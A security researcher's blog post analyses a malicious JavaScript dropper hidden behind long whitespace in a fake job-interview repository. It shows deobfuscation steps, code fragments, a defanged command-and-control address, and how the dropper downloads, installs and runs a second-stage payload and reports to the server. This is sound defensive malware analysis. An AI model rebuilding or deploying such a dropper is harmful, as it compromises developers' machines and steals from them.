Suspicious Code Repository for Job Seeker (Part 1)

By | September 28, 2024

I was told by my circles in WhatsApp Group that there was an X.com user almost become a victim of malicious code from a suspicious code repository. This post will discuss on what I did to uncover the details of the malicious obfuscated code inside the code repository.

The post actually began with the story of crypto exchange got hacked. It was September 11, 2024 morning and I was having a full heavy week workload handling multiple external audits when there were multiple suspicious transactions from INDODAX, the oldest Crypto Exchange in Indonesia, was detected by Cyvers Alerts on X. And 3 hours later, INDODAX announced that “they found potential indicators of security [sic]”. They are not event covering up the incident!

Bold moves from the CEO, that when he was interviewed by the host The Overpost he said that the network was infiltrated via a compromised laptop of an employee who sought for a moonlight with a good number of payment. This is a good move to share the incident so that the other players in the industry can prepare to embrace the similar incident, how to prevent it, how to detect it, and how to recover from it.

The search of sample

Soon after I watched this interview, one of my friends told me that there was an X user, Hynzo, an Indonesian Software Engineer tweeted that this user was almost attacked by the same so-called-malware. This user was given an offer as a freelancer with “wow” salary, and one of the selection processes was a take home assignment to fix the button in web project, posted on the public code repository.

Tweet from Hynzo

Luckily, Hynzo was skeptical with the received scam. The project was cloned and executed in virtual machine with Microsoft Defender installed on it. Hynzo said that the project was suspicious as the task was to fix the button, but the button was not exist anywhere in the project. Then, while the project was running in the background, the Microsoft Defender detected the malware Trojan:Python/Malgent.HNNA!MTB. Wow! This is what I’ve been looking for.

From Hynzoime https://x.com/hynzoime_/status/1837832189670838615/photo/1

Let’s hunt!

I visited the repo, search all things and any other relevant information for attack attribution. Little bit weird, that the repo is only have one single commit where the repo was created at September 7, 2024, and only has 1 single branch. No PR, no Tag.

Looking at the time when the repo was created and the distance between Hynzo cloned the project is considerably short, which only 3 days. Hynzo tweeted the story 12 days after the code was executed. And the day I started to observe the code was already more than 15 days since the repo was created, which is strange that usually the servers or any indicator of compromises are already deleted by the malware creator to conceal their tracks.

So far, the timeline (in GMT+7) is:

2024-09-07 02:34:20 Suspicious Repo was committed for the first time
2024-09-10 23:49:xx Executed code was flagged by Hynzo's Microsoft Defender-ed VM
2024-09-11 05:08:xx Cyvers Alerts notified INDODAX about the suspicious transactions
2024-09-21 16:33:11 CEO INDODAX interview was aired
2024-09-22 19:26:xx Hynzo tweeted the story
2024-09-25 09:32:47 I cloned the repo

Quick search for any occurrences of encrypted payload or encoded payload or obfuscated payload, I only found one JS file contains this strange part on the very bottom of the file.

How do I do that? Using command line in macOS to calculate the Shannon Entropy Number. There are already multiple journals discussed this number which was found by Claude Shannon in 1948 as part of Information Theory. The TLDR version is, entropy number can be used to indicate the randomness of information within a file. As you might be remember the characteristics of a good encryption should introduce randomness or predictability of the sequence of bytes. Means that low entropy that closer to 0 indicates a highly predictable bytes, something like in the regular ASCII file. While high entropy that is closer to 8, is an indicator of unpredictable byte sequence. In Digital Forensic world, we agree that low entropy is between 0-5, while 5-7 is considered as medium entropy and >7 is high entropy.

Key Takeaway #1:
Use entropy number to identify suspicious files. It could be false positives, but it is worth to detect it.

Hence, I calculated the entropy of the files in the cloned repo, showing it along with the file type or what we call MIME-type, then the filename. This is the zsh script that I used:

Zsh
find . -type f -exec sh -c 'mime=$(file --mime-type "$1" | awk "{print \$2}"); ent "$1" 2>/dev/null | grep -m 1 "Entropy =" | awk -v mime="$mime" -v file="$1" "{print \"\" \$3 \",\" mime \",\" file}"' _ {} \; > entropy.csv

Then I filtered that only text files, eliminating the binary files such as pictures. To make it easier to the reader, I put it on the spreadsheet. In the real scenario, I simply filter it with grep. Here’s the entropy number sorted descending and filtered only to source code.

That’s why the index.js under folder socket came to my first investigation. Opening up the file, searching the strange parts, then I found this. On the bottom part, there is a line with a very looooong space and one liner. So, if your editor is not turning on the word-wrap, and you are not scrolling to the right, then you would not be able to see this.

Deobfuscate it

The JavaScript code is obfuscated, and in order to make it more readable, I beautified the code so it will have clear code blocks. Most of the IDEs for programming have this feature. Then, eliminate the some confusing method call and hexadecimal numbers. I used web based JavaScript Deobfuscator https://deobfuscate.io/

The earlier code blocks are rotating the array into the correct order. This part is deliberately made so that it will be very hard if I just analyze it using static method. Then, I mixed it with dynamic code analysis too. Neglect the codes or functions that are not invoked or executed. JavaScript has IIFE or Immediately Invoked Function Expression. This expression will be executed the moment it is invoked or called in the JavaScript event loop. You can see this example:

JavaScript
(function (ax, ay) {
  const aL = E, az = ax();
  while (true) {
    try {
      const aA = -parseInt(aL(408)) / 1 * (parseInt(aL(423)) / 2) + -parseInt(aL(416)) / 3 * (parseInt(aL(397)) / 4) + parseInt(aL(404)) / 5 * (-parseInt(aL(429)) / 6) + parseInt(aL(426)) / 7 * (parseInt(aL(411)) / 8) + parseInt(aL(428)) / 9 * (-parseInt(aL(415)) / 10) + -parseInt(aL(406)) / 11 * (parseInt(aL(399)) / 12) + parseInt(aL(407)) / 13;
      if (aA === ay) break; else az.push(az.shift());
    } catch (aB) {
      az.push(az.shift());
    }
  }
}(C, 564989));

It declares a function that accepts ax and ay as parameters and immediately execute the function with ax = C, and ay = 564989. Looking at this code structure, I noticed that E is a function that accepts a and b as variables but only a is processed. The parameter a is actually the index of array but bigger than 397. For example code aL(408) is actually translated as E(408) = C[408-397] = C[11]. Here’s the function E that was referred by constant aL:

JavaScript
function E(a, b) {
  const c = C();
  return E = function (d, e) {
    d = d - 397;
    let f = c[d];
    return f;
  }, E(a, b);
}

While C is defined as a function that returns an array:

JavaScript
function C() {
  const aV = ["ZaG9tZWRpcg", "cm1TeW5j", "(((.+)+)+)+$", "10440710HzUsuL", "179904lrxukf", "from", "ZXhpc3RzU3luYw", "YcmVxdWVzdA", "cZXhlYw", "Z2V0", "bWtkaXJTeW5j", "830yUvaWs", "L2tleXM", "constructor", "14609iSZreQ", "zcGF0aA", "9AFctrk", "534RVeTvv", "base64", "cG9zdA", "d3JpdGVGaWxlU3luYw", "Zbm9kZTpwcm9jZXNz", "search", "caG9zdG5hbWU", "8hKoXZe", "aY2hpbGRfcHJvY2Vzcw", "277008nOiLfN", "join", "YcGxhdGZvcm0", "sqj", "toString", "60985KjIMeh", "s2DzOA8", "253WICxLE", "53648465kqCNNO", "2099HINhgV", "apply", "utf8", "344dXnhwp"];
  C = function () {
    return aV;
  };
  return C();
}

where C is an array, with 39 elements. Invoking -parseInt(aL(408)) is translated to -parseInt(C[11]) = -parseInt("830yUvaWs"). If you notice, JavaScript is a weakly-typed-language that can process it and returns 830. But if the element is not started with number, even it contains number, the result is NaN. For example -parseInt("ZaG9tZWRpcg") is NaN. Hence, that IIFE above is actually these steps:

  1. Parsing Integer value from the array elements, and do the arithmetic based on the defined operations.
  2. If the result of the arithmetic calculation equals to 564989 then stop the shuffling process.
  3. If the result of the arithmetic calculation is not equal to 564989 then shuffle the array by pushing the very first element as the last element.
  4. If the result of the arithmetic calculation is NaN (not a number), also shuffle the array by pushing the very first element as the last element.

Going back to the IIFE above, I can tell that this function is actually shifting the array to the intended order by the code creator. After it gets shuffled 24 times, then I can see the shifted array from original array order (on left side) to the correct order (on the right side):

After the array has been shuffled into the correct order, then I see this declaration, which then I deobfuscated it into the next JavaScript line below.

JavaScript
O = ax => (s1 = ax.slice(1), Buffer[aO(417)](s1, I)[aO(403)](K));

// substitute the variables to the real value...
function O(ax) { let s1 = ax.slice(1); Buffer["from"](s1, "base64")["toString"]("utf8") };

// ... then convert it into the more readble standard JavaScript
function O(ax) { let s1 = ax.slice(1); Buffer.from(s1, "base64").toString("utf8") };

and using the pattern of array invocation, I noticed that most of the elements are in base64 encoded string. Hence I use Cyberchef to help me to decode it. This is the Recipe if you are wondering:

Notice that even I used base64 encoding, only several elements are able to be decoded to English Language. That’s because there is one excess character in the beginning of the string, then the function O(ax) will delete the first character then perform the base64 decoding again. After doing this operation, I found interesting keywords, that is related with NodeJS keywords.

ò¨]—
child_process
Û¾ôÓÉΈ·Í
Žˆ§
platform
²¨
¶„­®)à
ëO|ä¨È1è
³`ó8
ÛÖ ,K
ç~¸óŽ¹’ 4
ÛO}ƒa
jše
º×ü
ߎ^xp
homedir
rmSync
×N8Ó½t5,¸
׿}ӉkÆé
~º&
existsSync
request
exec
get
mkdirSync
ó}2Rö–
/keys
r‰ì¶»œ¶Š
׎´ö$™­ä
path
ô\¶¹
ç~Uäï
m«ë
post
writeFileSync
node:process
±æ«r
hostname

Those are common keywords in JavaScript, right? Go on. Still following me? I also noticed a function a0 as follows:

JavaScript
const a0 = () => {
  let ax = "MTQ3LjEyNCaHR0cDovLw4yMTQuMTI5OjEyNDQ=  ";
  for (var ay = "", az = "", aA = "", aB = "", aC = 0; aC < 10; aC++) ay += ax[aC], az += ax[10 + aC], aA += ax[20 + aC], aB += ax[30 + aC];
  return ay = ay + aA + aB, Q(az) + Q(ay);

If you directly decode the string ax as if it is decoded using base64, you won’t get any useful string. You need to see the next for loop, which then shuffling the order of characters in variable ax, then it will give you the correct string "MTQ3LjEyNC4yMTQuMTI5OjEyNDQ=" and "aHR0cDovLw" which then decoded as hxxp://147[.]124.214.129:1244. I intentionally change the protocol and add the square bracket to prevent that string becomes active link in your device. And I found the IoC for me to block into my network.

Key Takeaway #2:
Searching IoC or Indicator of Compromise is not easy. Sometimes it is blatantly hardcoded to the body of code, sometimes you need to do certain dynamic analysis first. In this code, we found out that the IP address to communicate to the C2 server (command and control server) after shuffling and decoding the base64 string. But in other samples, the communication from dropper or malicious code is revealed or activated by certain events (e.g. by specific date, by executing things, etc.), or certain criteria (e.g. specific internal IP address, specific processor type, specific strings in system information, etc.). This IP address is one of the indicators that if your network making communication to this, means that one of your endpoints already in the initial stage of compromise.

Then the rest is simply following the instructions. Since my testing is using Microsoft Windows, then the homedir is standard usual homedir in Win32 shell environment. This homedir is the base folder for the malicious script to save the files from its C2 server.

This code is accessing the url using GET method to hxxp://147[.]124.214.129:1244/j/s2DzOA8 and save the result to test.js. It is followed by downloading another file using GET method to hxxp://147[.]124.214.129:1244/p and save this as package.json. The content of the package.json itself is:

JavaScript
{
   "dependencies": {
      "child_process": "^1.0.2",
      "request": "^2.88.2",
      "crypto": "^1.0.1"
   }
}

The package.json file then get executed using command npm i --silent. I believe this is to ensure that whatever in the test.js needs these dependencies/libraries. Then execute the test.js. After the execution is done, then the the script send data using POST method to the website hxxp://147[.]124.214.129:1244/keys and the POST data is:

{
  ts: Date.now().toString(),
  type: 's2DzOA8',
  hid: 'cmp',
  ss: 'sqj',
  cc: 'require("node:process")["argv"][1]'
}

I’m guessing that this is telling the C2 server that the first step of execution is done at specific timestamp, the test.js has been downloaded, and the first obfuscated code was executed using what commands/arguments.

Key Takeaway #3:
Without knowing the obfuscated or encrypted payloads, do not directly execute the code even if you use the VM. By executing the code above, your IP address is still recorded by the server. Beware that the malware creator can conduct the retaliation if they found out the data posted to their server is not tally or not as expected, for example the key cc above is empty.

In malware analysis, this obfuscated called dropper. Nothing special with this and no suspicious system call, function call, or routines that can be flag by any EDRs or AVs installed on victim’s laptop. I uploaded this obfuscated part to https://www.hybrid-analysis.com and the result was clean.

Then I’m wondering what is inside the test.js file. Stay tune, as I will write it on the part 2 for this.

Key Takeaway #4:
Without knowing the obfuscated or encrypted payloads, do not directly upload the code to public multi-av sites something like VirusTotal, Hybrid-Analysis, etc. Once your code uploaded and analyzed, the code becomes public sample that can be downloaded by other premium customers to study. Imagine that the IoC inside the obfuscated code is simply only pointing or detecting your ASN, your domain, your processors. Then your code will be publicly discussed with headline: “The [put your organization here] is spear phished by a malware created by [put any attribution to malware creator here]”

So far, the timeline (in GMT+7) is:

2024-09-07 02:34:20 Suspicious Repo was committed for the first time
2024-09-10 23:49:xx Executed code was flagged by Hynzo's Microsoft Defender-ed VM
2024-09-11 05:08:xx Cyvers Alerts notified INDODAX about the suspicious transactions
2024-09-21 16:33:11 CEO INDODAX interview was aired
2024-09-22 19:26:xx Hynzo tweeted the story
2024-09-25 09:32:47 I cloned the repo
2024-09-25 11:06:22 I checked with hybrid-analysis.com

Leave a ReplyCancel reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.